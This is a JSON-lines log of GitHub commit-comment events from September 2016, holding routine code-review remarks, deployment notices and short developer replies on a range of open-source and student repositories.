{"id":"4626485429","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19196917,"position":null,"line":null,"path":null,"commit_id":"f822fd22f76894a7a3e0ac38951f13c4a30a3c54","created_at":"2016-09-27T19:43:27Z","updated_at":"2016-09-27T19:43:27Z","body":"The following doc(s) have been deployed to the [1893termin](https://1893termin-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus-deprecated](https://1893termin-static-docs.pantheonsite.io/docs/terminus-deprecated)\n- [docs/guides/terminus](https://1893termin-static-docs.pantheonsite.io/docs/guides/terminus)\n"}},"created_at":"2016-09-27T19:43:27Z"}
{"id":"4626486437","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196921,"position":154,"line":154,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:43:39Z","updated_at":"2016-09-27T19:43:39Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:43:39Z"}
{"id":"4626486850","type":"CommitCommentEvent","actor":{"login":"Nivelium"},"repo":{"name":"Nivelium/Shop"},"payload":{"comment":{"id":19196923,"position":null,"line":null,"path":null,"commit_id":"acdb7e8f87c34e3d23d10a741036eb82b627cf7c","created_at":"2016-09-27T19:43:44Z","updated_at":"2016-09-27T19:43:44Z","body":"asdf"}},"created_at":"2016-09-27T19:43:44Z"}
{"id":"4626488186","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196924,"position":175,"line":175,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:44:00Z","updated_at":"2016-09-27T19:44:00Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:44:00Z"}
{"id":"4626489577","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196926,"position":189,"line":189,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:44:16Z","updated_at":"2016-09-27T19:44:16Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:44:16Z"}
{"id":"4626490593","type":"CommitCommentEvent","actor":{"login":"dennisbuijsgmailcom"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":19196930,"position":null,"line":null,"path":null,"commit_id":"528625adb2581d2fcaf2d943b29a5b5c78b4a0a3","created_at":"2016-09-27T19:44:27Z","updated_at":"2016-09-27T19:44:27Z","body":"SUM((op.price + op.tax) * op.quantity)\r\n\r\nOr\r\n\r\nSUM(op.total + (op.tax * op.quantity))\r\n"}},"created_at":"2016-09-27T19:44:27Z"}
{"id":"4626492906","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196935,"position":98,"line":98,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.validate.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:44:55Z","updated_at":"2016-09-27T19:44:55Z","body":"Add test case that destination props are set."}},"created_at":"2016-09-27T19:44:55Z"}
{"id":"4626493383","type":"CommitCommentEvent","actor":{"login":"awoz"},"repo":{"name":"DarkWishMaster/TinyStdio"},"payload":{"comment":{"id":19196938,"position":null,"line":null,"path":null,"commit_id":"4a52637ebc8c62cdeeedf82e513d0a3bfe8dd209","created_at":"2016-09-27T19:45:01Z","updated_at":"2016-09-27T19:45:01Z","body":"Looks like tinyprintf.[ch] at sparetimelabs has removed GPL but tinyprintf.[ch] at github has not. Its that pesky GPL header that still needs revision.\r\n\r\n-Thanks"}},"created_at":"2016-09-27T19:45:01Z"}
{"id":"4626493826","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196941,"position":111,"line":111,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.validate.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:45:07Z","updated_at":"2016-09-27T19:45:07Z","body":"Add test case that no destination props are set."}},"created_at":"2016-09-27T19:45:07Z"}
{"id":"4626493995","type":"CommitCommentEvent","actor":{"login":"thinkyhead"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19196942,"position":null,"line":null,"path":null,"commit_id":"ea0dbee3c93fa221b8c7d3b6c566d635eae2afd2","created_at":"2016-09-27T19:45:09Z","updated_at":"2016-09-27T19:45:09Z","body":"Cleaned up a bunch today. As I look through the changes above, I can't see any obvious cause for Y movement during Z probing. I will keep looking.\r\n\r\nIf you could post a log it may help. To do this, enable `DEBUG_LEVELING_FEATURE` then issue the command `M111 S32` before doing `G28` and `G29 V4`. Post the log output and the place where Y movement occurs, and the cause, ought to be quite clear. I will post a fix as soon as I know the cause."}},"created_at":"2016-09-27T19:45:09Z"}
{"id":"4626496027","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19196948,"position":7,"line":22,"path":"static/css/material.less","commit_id":"acab37c898b6ad6206ed2ba6709b7f6e1a1bb629","created_at":"2016-09-27T19:45:31Z","updated_at":"2016-09-27T19:45:31Z","body":"Use \"0\" not \"0px\". Also applies to many of the other changes below..."}},"created_at":"2016-09-27T19:45:31Z"}
{"id":"4626499470","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19196956,"position":95,"line":6253,"path":"api/easyrtc.js","commit_id":"b604cb8dd5d23c804a194de4f1d627750814ca18","created_at":"2016-09-27T19:46:10Z","updated_at":"2016-09-27T19:46:10Z","body":"would be nice to have \"audio\" || \"video\" || \"audiovideo\" for the callback\r\n\r\n```\r\nvar mediaType = '';\r\nif (peerConn.sharingAudio) {\r\nmediaType += 'audio';\r\n}\r\nif (peerConn.sharingVideo) {\r\nmediaType += 'video';\r\n} \r\n```\r\n\r\nalso dataChanel ?"}},"created_at":"2016-09-27T19:46:10Z"}
{"id":"4626499792","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19196960,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:46:15Z","updated_at":"2016-09-27T19:46:15Z","body":"Remove char boost as it is impossible to implement it on 5.4.7 because it was added in 5.4.8"}},"created_at":"2016-09-27T19:46:15Z"}
{"id":"4626502334","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19196965,"position":null,"line":null,"path":null,"commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T19:46:43Z","updated_at":"2016-09-27T19:46:43Z","body":"lgtm tested on Chrome and Firefox."}},"created_at":"2016-09-27T19:46:43Z"}
{"id":"4626503930","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196967,"position":29,"line":29,"path":"lib/node_modules/@stdlib/utils/deep-pluck/lib/deep_pluck.js","commit_id":"309279bbdb41e4909aa0a959586133dbdd9604cb","created_at":"2016-09-27T19:47:03Z","updated_at":"2016-09-27T19:47:03Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T19:47:03Z"}
{"id":"4626504731","type":"CommitCommentEvent","actor":{"login":"Naatan"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19196969,"position":6,"line":118,"path":"components/koGoLanguage.py","commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-27T19:47:12Z","updated_at":"2016-09-27T19:47:12Z","body":"Shouldn't there be a space here?"}},"created_at":"2016-09-27T19:47:12Z"}
{"id":"4626508865","type":"CommitCommentEvent","actor":{"login":"fellague"},"repo":{"name":"fellague/ConsultationManager"},"payload":{"comment":{"id":19196977,"position":null,"line":null,"path":null,"commit_id":"50b9f3dbf75d697de450f2e28f7bf89cb900edca","created_at":"2016-09-27T19:48:00Z","updated_at":"2016-09-27T19:48:00Z","body":"Adding Organnized Lists of RDVs and finishing with Hospitalization"}},"created_at":"2016-09-27T19:48:00Z"}
{"id":"4626509126","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19196978,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:48:03Z","updated_at":"2016-09-27T19:48:03Z","body":"@cybrann but soon we will move to 5.4.8 is not true?"}},"created_at":"2016-09-27T19:48:03Z"}
{"id":"4626514000","type":"CommitCommentEvent","actor":{"login":"Annpettway"},"repo":{"name":"Annpettway/Nice-or-Mean"},"payload":{"comment":{"id":19196985,"position":null,"line":null,"path":null,"commit_id":"f2bd485195d026d094b0bd5735705a5f34680304","created_at":"2016-09-27T19:48:56Z","updated_at":"2016-09-27T19:48:56Z","body":"<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=youtu.be/sVWpHa_sdeA\r\n\" target=\"_blank\"><img src=\"http://img.youtube.com/vi/youtu.be/sVWpHa_sdeA/0.jpg\" \r\nalt=\"Nice or Mean\" width=\"240\" height=\"180\" border=\"10\" /></a>"}},"created_at":"2016-09-27T19:48:56Z"}
{"id":"4626516128","type":"CommitCommentEvent","actor":{"login":"typical000"},"repo":{"name":"cssinjs/jss-compose"},"payload":{"comment":{"id":19196990,"position":5,"line":6,"path":"karma.conf.js","commit_id":"0a8d4000fa32e7c16fcb92cae2f24c29c313bba7","created_at":"2016-09-27T19:49:21Z","updated_at":"2016-09-27T19:49:21Z","body":"So, maybe lets remove some dependencies from https://github.com/cssinjs/jss/blob/master/package.json ?\r\n\"karma-firefox-launcher\" and \"karma-safari-launcher\" this."}},"created_at":"2016-09-27T19:49:21Z"}
{"id":"4626516232","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/middleware"},"payload":{"comment":{"id":19196991,"position":4,"line":1354,"path":"src/dispatcher/plugins/DiskPlugin.py","commit_id":"864672e19194ed600377c0909410803d6ca1ecb6","created_at":"2016-09-27T19:49:22Z","updated_at":"2016-09-27T19:49:22Z","body":"Yeah, let's just leave it inside `disk-status`."}},"created_at":"2016-09-27T19:49:22Z"}
{"id":"4626517059","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19196993,"position":null,"line":null,"path":null,"commit_id":"4944da89f915aa739bc88001d37cfba02867eacb","created_at":"2016-09-27T19:49:32Z","updated_at":"2016-09-27T19:49:32Z","body":"Initial commit."}},"created_at":"2016-09-27T19:49:32Z"}
{"id":"4626518966","type":"CommitCommentEvent","actor":{"login":"cycloon"},"repo":{"name":"tn5250j/tn5250j"},"payload":{"comment":{"id":19196996,"position":null,"line":null,"path":null,"commit_id":"6659596bb9ac837544711b72ae36af0ea5cc7ef1","created_at":"2016-09-27T19:49:54Z","updated_at":"2016-09-27T19:49:54Z","body":"Oh wow! Nice, thanks."}},"created_at":"2016-09-27T19:49:54Z"}
{"id":"4626520732","type":"CommitCommentEvent","actor":{"login":"michail-nikolaev"},"repo":{"name":"michail-nikolaev/task-force-arma-3-radio"},"payload":{"comment":{"id":19197000,"position":null,"line":null,"path":null,"commit_id":"47d03aa686d96169fe13a5c4cfe139b081031265","created_at":"2016-09-27T19:50:14Z","updated_at":"2016-09-27T19:50:14Z","body":"nice :)"}},"created_at":"2016-09-27T19:50:14Z"}
{"id":"4626524213","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197005,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:50:53Z","updated_at":"2016-09-27T19:50:53Z","body":"It indicated our goals. Upgrading to version 5.4.8 is also our goal."}},"created_at":"2016-09-27T19:50:53Z"}
{"id":"4626524481","type":"CommitCommentEvent","actor":{"login":"EricDavies"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19197006,"position":68,"line":68,"path":"api/labs/easyrtc_recorder.js","commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T19:50:56Z","updated_at":"2016-09-27T19:50:56Z","body":"It should probably be an options argument (which defaults to {}) so you can specify recorded bit rates as well if you chose."}},"created_at":"2016-09-27T19:50:56Z"}
{"id":"4626526864","type":"CommitCommentEvent","actor":{"login":"robbiecarlton"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19197008,"position":null,"line":null,"path":null,"commit_id":"5a01c6a3f81d0e26a1e0dcdf3f1c02987ca05dd1","created_at":"2016-09-27T19:51:25Z","updated_at":"2016-09-27T19:51:25Z","body":"@levity - will you take a look at this when you get a chance. This was my best approach at keeping the checklist update, but it feels a little ad hoc. Wondering if you can see a neater way to do this?"}},"created_at":"2016-09-27T19:51:25Z"}
{"id":"4626527220","type":"CommitCommentEvent","actor":{"login":"EricDavies"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19197009,"position":154,"line":154,"path":"api/labs/easyrtc_recorder.js","commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T19:51:28Z","updated_at":"2016-09-27T19:51:28Z","body":"oops! you are quite correct. I'll fix."}},"created_at":"2016-09-27T19:51:28Z"}
{"id":"4626527407","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-responsive"},"payload":{"comment":{"id":19197011,"position":10,"line":402,"path":"Assignment/starter_code/css/style.css","commit_id":"d8a0c5f69f4c8ef2acba96c4e6756e0a2cf6e6b5","created_at":"2016-09-27T19:51:30Z","updated_at":"2016-09-27T19:51:30Z","body":"great work using em!"}},"created_at":"2016-09-27T19:51:30Z"}
{"id":"4626528025","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197014,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:51:37Z","updated_at":"2016-09-27T19:51:37Z","body":"We will, but who will replace opcodes and structure bcs I don't have time now"}},"created_at":"2016-09-27T19:51:37Z"}
{"id":"4626528620","type":"CommitCommentEvent","actor":{"login":"crantron"},"repo":{"name":"GigaSavvy/Mailgun-Magento2"},"payload":{"comment":{"id":19197017,"position":null,"line":null,"path":null,"commit_id":"e365b0f8ff1d3f7ed282bd503c410d9188c3fb98","created_at":"2016-09-27T19:51:44Z","updated_at":"2016-09-27T19:51:44Z","body":"I have forked this project, https://github.com/GigaSavvy/Mailgun-Magento2/"}},"created_at":"2016-09-27T19:51:44Z"}
{"id":"4626528806","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-responsive"},"payload":{"comment":{"id":19197019,"position":24,"line":416,"path":"Assignment/starter_code/css/style.css","commit_id":"d8a0c5f69f4c8ef2acba96c4e6756e0a2cf6e6b5","created_at":"2016-09-27T19:51:47Z","updated_at":"2016-09-27T19:51:47Z","body":"Great to see you playing around with max-width "}},"created_at":"2016-09-27T19:51:47Z"}
{"id":"4626529000","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19197022,"position":null,"line":null,"path":null,"commit_id":"1b6eeb3d16c62e169d353e820c42929de552b7c1","created_at":"2016-09-27T19:51:49Z","updated_at":"2016-09-27T19:51:49Z","body":"Initial commit."}},"created_at":"2016-09-27T19:51:49Z"}
{"id":"4626530314","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-responsive"},"payload":{"comment":{"id":19197025,"position":5,"line":292,"path":"Assignment/starter_code/css/style.css","commit_id":"876b08d7485a0a1e2d3d4185e1ff8498bd7ea5cc","created_at":"2016-09-27T19:52:05Z","updated_at":"2016-09-27T19:52:05Z","body":"👍 "}},"created_at":"2016-09-27T19:52:05Z"}
{"id":"4626530751","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19197026,"position":null,"line":null,"path":null,"commit_id":"895257f91c4e980d96b9dc8449e3f59ac1e4d8a2","created_at":"2016-09-27T19:52:10Z","updated_at":"2016-09-27T19:52:10Z","body":"I feel like this should have been caught and converted by `editorconfig`. I wonder where in the process spaces were used, rather than tabs."}},"created_at":"2016-09-27T19:52:10Z"}
{"id":"4626532367","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-responsive"},"payload":{"comment":{"id":19197031,"position":111,"line":375,"path":"Assignment/starter_code/css/style.css","commit_id":"876b08d7485a0a1e2d3d4185e1ff8498bd7ea5cc","created_at":"2016-09-27T19:52:28Z","updated_at":"2016-09-27T19:52:28Z","body":"Nice work using relative units for this!"}},"created_at":"2016-09-27T19:52:28Z"}
{"id":"4626532878","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197033,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:52:33Z","updated_at":"2016-09-27T19:52:33Z","body":"Everything will ... with time ..."}},"created_at":"2016-09-27T19:52:33Z"}
{"id":"4626535426","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"michail-nikolaev/task-force-arma-3-radio"},"payload":{"comment":{"id":19197044,"position":null,"line":null,"path":null,"commit_id":"47d03aa686d96169fe13a5c4cfe139b081031265","created_at":"2016-09-27T19:53:02Z","updated_at":"2016-09-27T19:53:02Z","body":"Reason was positions of curators were only processed if player is alive. And if they are not transmitted to the plugin the plugin thinks they are dead."}},"created_at":"2016-09-27T19:53:02Z"}
{"id":"4626535913","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19197047,"position":31,"line":270,"path":"static/js/controllers/contacts-content.js","commit_id":"14c6f9c06eba1f839d7e70dbbc05610ec91a766f","created_at":"2016-09-27T19:53:07Z","updated_at":"2016-09-27T19:53:07Z","body":"Here you can just `return dateA - dateB;`"}},"created_at":"2016-09-27T19:53:07Z"}
{"id":"4626538493","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19197053,"position":null,"line":null,"path":null,"commit_id":"4d707c7e5df2e65320da0ddd4929a86f7866ffa0","created_at":"2016-09-27T19:53:36Z","updated_at":"2016-09-27T19:53:36Z","body":"Initial commit."}},"created_at":"2016-09-27T19:53:36Z"}
{"id":"4626540825","type":"CommitCommentEvent","actor":{"login":"Deanb100"},"repo":{"name":"Deanb100/week1_homework"},"payload":{"comment":{"id":19197063,"position":null,"line":null,"path":null,"commit_id":"41b8e75725ef31e9229685e32e05658673ef975b","created_at":"2016-09-27T19:54:02Z","updated_at":"2016-09-27T19:54:02Z","body":"Dean's Day 2 Homework - see day2hworksoln.js and day2hworksoln.html"}},"created_at":"2016-09-27T19:54:02Z"}
{"id":"4626544247","type":"CommitCommentEvent","actor":{"login":"kirushik"},"repo":{"name":"yurizhuravel/yelp_clone"},"payload":{"comment":{"id":19197069,"position":8,"line":34,"path":"app/controllers/restaurants_controller.rb","commit_id":"102599ceb0e99c02d64c7b1e5c7fd536523e8856","created_at":"2016-09-27T19:54:42Z","updated_at":"2016-09-27T19:54:42Z","body":"I would really advise you to stick to route helpers and try to avoid hardcoded path strings at all costs — they are surprisingly hard to get rid of at the later stages, while making certain features and refactorings (say, having a locale-dependent paths i18n) almost impossible."}},"created_at":"2016-09-27T19:54:42Z"}
{"id":"4626546064","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19197072,"position":4,"line":179,"path":"templates/partials/contacts_content.html","commit_id":"14c6f9c06eba1f839d7e70dbbc05610ec91a766f","created_at":"2016-09-27T19:55:02Z","updated_at":"2016-09-27T19:55:02Z","body":"Are you able to remove this because on a task being resolved the RulesEngine will update the list with only unresolved tasks?"}},"created_at":"2016-09-27T19:55:02Z"}
{"id":"4626546535","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197075,"position":5,"line":5,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:55:08Z","updated_at":"2016-09-27T19:55:08Z","body":"este es el scope"}},"created_at":"2016-09-27T19:55:08Z"}
{"id":"4626548414","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197081,"position":1,"line":1,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:55:27Z","updated_at":"2016-09-27T19:55:27Z","body":"`ProviderDispatcherPolicy`"}},"created_at":"2016-09-27T19:55:27Z"}
{"id":"4626548686","type":"CommitCommentEvent","actor":{"login":"dimi309"},"repo":{"name":"dimi309/small3d"},"payload":{"comment":{"id":19197082,"position":null,"line":null,"path":null,"commit_id":"c89e759db8554e52f06ee5e9e10a370302403a0f","created_at":"2016-09-27T19:55:30Z","updated_at":"2016-09-27T19:55:30Z","body":"As a matter of fact, you've won. I had misunderstood what your export statement was doing [here](https://github.com/dimi309/small3d/pull/38) and I didn't know we could \"conan install ..\" (referencing a different directory from the one we are in). It turns out, it's much better your way, which indeed keeps things cleaner. So now the samples too have CMAKE_BINARY_DIR in their CmakeLists.txt files and work just fine with their new instructions (in the develop branch for the moment):\r\n\r\nhttps://github.com/dimi309/small3d/tree/develop/samples/AvoidTheBug3D\r\n\r\nBy the way, sorry about the breaking changes I am introducing these days. I was doing a lot of dumb things while I was rushing to learn everything and get the engine to work somehow, and I left a lot of garbage behind which I am cleaning up now. I am making the interface more coherent and have gotten rid of a lot of useless dynamic memory allocations. And there's more improvements to come, which means that things will change some more, in my opinion for the better 😄 I write about all these changes in the CHANGELOG.md file"}},"created_at":"2016-09-27T19:55:30Z"}
{"id":"4626549090","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197084,"position":1,"line":1,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:55:34Z","updated_at":"2016-09-27T19:55:34Z","body":"https://github.com/elabs/pundit"}},"created_at":"2016-09-27T19:55:34Z"}
{"id":"4626553478","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197089,"position":1,"line":1,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:56:21Z","updated_at":"2016-09-27T19:56:21Z","body":"lol"}},"created_at":"2016-09-27T19:56:21Z"}
{"id":"4626555402","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"fedora-python/python26"},"payload":{"comment":{"id":19197094,"position":null,"line":null,"path":null,"commit_id":"45da95ba24d90dd16606cfea1f7c7879746fd734","created_at":"2016-09-27T19:56:41Z","updated_at":"2016-09-27T19:56:41Z","body":"Good."}},"created_at":"2016-09-27T19:56:41Z"}
{"id":"4626556750","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19197096,"position":67,"line":301,"path":"static/js/controllers/contacts-content.js","commit_id":"14c6f9c06eba1f839d7e70dbbc05610ec91a766f","created_at":"2016-09-27T19:56:56Z","updated_at":"2016-09-27T19:56:56Z","body":"I'm torn on whether it's better to sort in the controller or let angular sort in the ng-repeat statement. What do you think?"}},"created_at":"2016-09-27T19:56:56Z"}
{"id":"4626556771","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197097,"position":5,"line":5,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:56:56Z","updated_at":"2016-09-27T19:56:56Z","body":"si, los proveedores son los q tienen q crear sus despachadores"}},"created_at":"2016-09-27T19:56:56Z"}
{"id":"4626558781","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19197103,"position":5,"line":5,"path":"app/policies/provider_dispatcher_policy.rb","commit_id":"8a1abbdd377029eff599a127e6d072b662cdf3c9","created_at":"2016-09-27T19:57:17Z","updated_at":"2016-09-27T19:57:17Z","body":"https://github.com/elabs/pundit#scopes"}},"created_at":"2016-09-27T19:57:17Z"}
{"id":"4626568281","type":"CommitCommentEvent","actor":{"login":"robinbentley"},"repo":{"name":"robinbentley/dotfiles"},"payload":{"comment":{"id":19197125,"position":36,"line":39,"path":"vimrc","commit_id":"d78591540b980da2cd67a23fb2bcc574ff074038","created_at":"2016-09-27T19:59:01Z","updated_at":"2016-09-27T19:59:01Z","body":"Install script was getting stuck expecting user input because the colorscheme could not be found. Silence errors on the colorscheme"}},"created_at":"2016-09-27T19:59:01Z"}
{"id":"4626568568","type":"CommitCommentEvent","actor":{"login":"cer"},"repo":{"name":"dartpopikyardo/eventuate-examples-java-customers-and-orders"},"payload":{"comment":{"id":19197126,"position":6,"line":6,"path":"buildSrc/src/main/groovy/VerifyEventStoreEnvironmentPlugin.groovy","commit_id":"47b3dd08f73ce3ffb6f60e295e987e4c12efa974","created_at":"2016-09-27T19:59:04Z","updated_at":"2016-09-27T19:59:04Z","body":"This is incorrect if you are using Eventuate Local"}},"created_at":"2016-09-27T19:59:04Z"}
{"id":"4626571883","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197134,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T19:59:39Z","updated_at":"2016-09-27T19:59:39Z","body":"@cybrann please accept the invitation Team!"}},"created_at":"2016-09-27T19:59:39Z"}
{"id":"4626572151","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19197135,"position":17,"line":71,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"71419f8cd32a849b86f92787c558565ae3b2772a","created_at":"2016-09-27T19:59:41Z","updated_at":"2016-09-27T19:59:41Z","body":"The Exception is caught in line 87 / line 82 in the new version."}},"created_at":"2016-09-27T19:59:41Z"}
{"id":"4626572198","type":"CommitCommentEvent","actor":{"login":"samoht"},"repo":{"name":"dbuenzli/topkg"},"payload":{"comment":{"id":19197136,"position":3,"line":3,"path":"CHANGES.md","commit_id":"e8d7220bfaa3494f3d02ae4121343e873902911b","created_at":"2016-09-27T19:59:42Z","updated_at":"2016-09-27T19:59:42Z","body":"`odig`?"}},"created_at":"2016-09-27T19:59:42Z"}
{"id":"4626572715","type":"CommitCommentEvent","actor":{"login":"zamaliev"},"repo":{"name":"zamaliev/pesokadel"},"payload":{"comment":{"id":19197139,"position":null,"line":null,"path":null,"commit_id":"d66653f01a2846ca964f7117551e4f6502243b19","created_at":"2016-09-27T19:59:48Z","updated_at":"2016-09-27T19:59:48Z","body":"test"}},"created_at":"2016-09-27T19:59:48Z"}
{"id":"4621555683","type":"CommitCommentEvent","actor":{"login":"amitbose327"},"repo":{"name":"seomoz/roger-mesos"},"payload":{"comment":{"id":19183746,"position":53,"line":74,"path":"aaad/quotas.py","commit_id":"1bc6e56c5bb25bd1d525273665b6f59f65f61ceb","created_at":"2016-09-27T02:04:29Z","updated_at":"2016-09-27T02:04:29Z","body":"Yes we should."}},"created_at":"2016-09-27T02:04:29Z"}
{"id":"4621556490","type":"CommitCommentEvent","actor":{"login":"fehguy"},"repo":{"name":"swagger-api/swagger-js"},"payload":{"comment":{"id":19183750,"position":7,"line":321,"path":"lib/client.js","commit_id":"535d505cc40314be5b0d010796cc9431d9d8ee3a","created_at":"2016-09-27T02:04:47Z","updated_at":"2016-09-27T02:04:47Z","body":"yes, thank you"}},"created_at":"2016-09-27T02:04:47Z"}
{"id":"4621564849","type":"CommitCommentEvent","actor":{"login":"JoanaVictoria"},"repo":{"name":"JoanaVictoria/Exemplo"},"payload":{"comment":{"id":19183773,"position":5,"line":5,"path":"src/Exemploproj.java","commit_id":"359567b9c5549a2dc5e0dea2b2f3289a2dc0264f","created_at":"2016-09-27T02:07:59Z","updated_at":"2016-09-27T02:07:59Z","body":"Adicionei um print linha5"}},"created_at":"2016-09-27T02:07:59Z"}
{"id":"4621565650","type":"CommitCommentEvent","actor":{"login":"kpam92"},"repo":{"name":"kpam92/codeRunr"},"payload":{"comment":{"id":19183774,"position":null,"line":null,"path":null,"commit_id":"3027f0d0c0985dbf14ef7978d47840ddb5d2b92d","created_at":"2016-09-27T02:08:21Z","updated_at":"2016-09-27T02:08:21Z","body":"too early, don't go further back than this"}},"created_at":"2016-09-27T02:08:21Z"}
